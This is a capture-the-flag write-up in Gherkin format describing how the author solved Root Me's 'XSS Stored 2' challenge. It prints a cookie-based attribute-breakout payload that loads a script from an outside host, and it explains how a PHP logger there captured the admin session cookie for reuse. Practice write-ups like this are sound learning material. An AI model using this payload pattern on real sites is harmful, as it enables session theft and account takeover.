## Version 2.0
## language: en

Feature: Web Client - XSS Stored 2 - Root Me
  Site:
    root-me.org
  User:
    william73
  Goal:
    Find the admin's session cookie and his password

  Background:
  Hacker's software:
    | <Software name>   |  <Version> |
    | Microsoft Windows |     10     |
    | Google Chrome     |  76.0.3809 |
    | Python            |    3.7.4   |
  Machine Information:
    Given this is a web-based challenge,
    And the vulnerability lies on the client side
    When a session is established and must be stolen
    Then we will fetch a mechanism for injecting JS code
    But the vulnerability is also on the server side
    Given the content is not being sanitized).

  Scenario: Fail:
    Given I start the challenge
    And it prompts
    """
    Steal the administrator session’s cookie and go in the admin section.
    """
    And a web page loads, with two form fields to write posts.

  Scenario: Fail: inspect-source-code
    Given I can make new posts,
    And they are kept in the web page
    When I try to inject script tags
    Then they are sanitized instantly

  Scenario: Fail: inject-code-cookie
    When I realize the cookies content are displayed on the page
    Then I can modify the cookie,
    And it will be shown as code on the web site
    Then I try to inject script tags inside the cookie,
    But they are also sanitized.

  Scenario: Success: close-attrib-include-file
    Given I realize that there is a cookie param
    And that cookie param is named status
    And its content determine the content of an HTML attribute
    And that HTML attribute is class
    And I try to put content inside, and add a double-quote ending character.
    When it works
    Then I'm prepared for script-injection.
    Then I serve two files on a testing host
    And one is a query string saver, done in PHP (i.e. it saves requests)
    But I was not able to inject a script inside tags.
    Then I serve the second file, a JS responsible of my desired actions.
    Then I open the browser's console.
    And I put
    """
    document.cookie = "status=invite\" id=''>
    <script src='http://stop-go-chests.000webhostapp.com/js.js'>
    ''</script tag=\""
    """
    And this is the content of the JS file I serve.
    And the request is done
    And I go to my logger file, and I find
    """
    ADMIN_COOKIE=SY2USDIH78TF3DFU78546TE7F
    """
    Then I put it on the cookie this way, again using the console:
    """
    document.cookie = "ADMIN_COOKIE=SY2USDIH78TF3DFU78546TE7F;"
    """
    And I notice there is an admin secion, then I navigate to it
    And it is the same as the challenge's web page
    But with a ?status=admin query string
    And I get the administrator's password
